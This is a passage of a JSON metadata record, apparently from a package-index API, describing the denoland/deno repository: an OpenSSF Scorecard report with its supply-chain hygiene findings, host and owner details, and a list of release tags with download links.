ame":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7